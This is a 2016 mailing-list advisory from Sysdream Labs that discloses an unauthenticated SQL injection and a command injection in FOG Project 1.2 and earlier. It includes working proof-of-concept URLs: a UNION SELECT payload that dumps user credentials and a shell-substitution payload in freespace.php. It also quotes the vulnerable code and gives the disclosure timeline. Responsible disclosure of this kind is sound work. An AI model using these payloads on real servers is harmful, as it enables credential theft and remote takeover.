|
Message-ID: <32be31eb-ce40-c3d5-db44-39b4bc8e84e6@sysdream.com>
Date: Tue, 19 Jul 2016 11:12:32 +0200
From: Sysdream Labs <labs@...dream.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: CVE ID Request: FOG Project Multiple Vulnerabilities
# FOG Project Multiple Vulnerabilities
## Description
FOG is a free, open source, computer cloning and management solution.
## SQL Injection
The database functions located in the *FOGManagerController.class.php* file do not sanitize some parameters, which can input from unauthenticated users.
Thus, an attacker without any privilege could execute arbitrary SQL commands and retrieve sensitive information from the database.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 9.3 (Critical)
### Proof of Concept
Payload:
```
' UNION ALL SELECT NULL,NULL,(SELECT GROUP_CONCAT(CONCAT_WS(':', uName, uPass)) FROM users),NULL,NULL-- -
```
Base64 Encoded :
```
https://fogserver/fog/service/updates.php?action=ask&file=JyBVTklPTiBBTEwgU0VMRUNUIE5VTEwsTlVMTCwoU0VMRUNUIEdST1VQX0NPTkNBVChDT05DQVRfV1MoJzonLCB1TmFtZSwgdVBhc3MpKSBGUk9NIHVzZXJzKSxOVUxMLE5VTEwtLSA=
```
### Vulnerable code
The vulnerable code is located in *packages/web/lib/fog/FOGManagerController.class.php*, line 96, function *find()*:
```
if (is_array($value))
$whereArray[] = sprintf("`%s` IN ('%s')", $this->DB->sanitize($this->key($field)), implode("', '", $value));
else
$whereArray[] = sprintf("`%s` %s '%s'", $this->DB->sanitize($this->key($field)), (preg_match('#%#', $value) ? 'LIKE' : '='), $value);
```
Note: *sanitize()* is applied on the database table field (not on the user-controlled value) and it does not filter back-quotes. As a consequence, this function is useless.
Line 143, function *count()*:
```
if (is_array($value))
$whereArray[] = sprintf("`%s` IN ('%s')", $this->DB->sanitize($this->key($field)), implode("', '", $value));
else
$whereArray[] = sprintf("`%s` %s '%s'", $this->DB->sanitize($this->key($field)), (preg_match('#%#', $value) ? 'LIKE' : '='), $value);
```
The vulnerable functions can be called in multiple files, without any authentication.
File: *packages/web/service/updates.php*, line 14:
```
foreach($FOGCore->getClass('ClientUpdaterManager')->find(array('name' => base64_decode($_REQUEST['file']))) AS $ClientUpdate)
```
File *packages/web/service/servicemodule-active.php*, line 14:
```
$moduleID = current($FOGCore->getClass('ModuleManager')->find(array('shortName' => $_REQUEST['moduleid'])));
```
### Solution
Sanitize every user-supplied input when passing it to SQL Queries.
## Unauthenticated Remote Command Execution
The *freespace.php* file does not correctly sanitize user-supplied *idnew* parameters. An unauthenticated attacker may use this file to execute system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-88
**CVSS Base Score**: 10 (Critical)
### Proof of Concept
```
https://fogserver/status/freespace.php?idnew[path]=$(sleep%205)&idnew[id]=555&idnew[name]=SD&idnew[ip]=1234
```
### Vulnerable code
The vulnerable code is located in *packages/web/status/freespace.php*, line 34:
```
$StorageNode = ($_REQUEST['idnew'] ? new StorageNode($_REQUEST['idnew']) : null);
[...snip...]
$t = shell_exec("df ".$StorageNode->get('path')."| grep -vE \"^Filesystem|shm\"");
```
### Solution
Sanitize and verify every user-supplied input when passing it to shell_exec. Also, make sure only authenticated users can access this file.
### Affected versions
* FOG Stable <= 1.2
## Solution
Switch to beta/development builds.
## Timeline (dd/mm/yyyy)
* 05/04/2016 : Initial discovery
* 06/07/2016 : Contact with vendor team with vulnerability description
* 18/07/2016 : Remind vendor to get a reply
* 19/07/2016 : Vendor acknowledges the report, saying that issues had been fixed a while ago in beta/development builds and that using 1.2.0 stable version is now discouraged.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
* Gyver FERRAND, Sysdream (g.ferrand -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@...dream.com>
GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.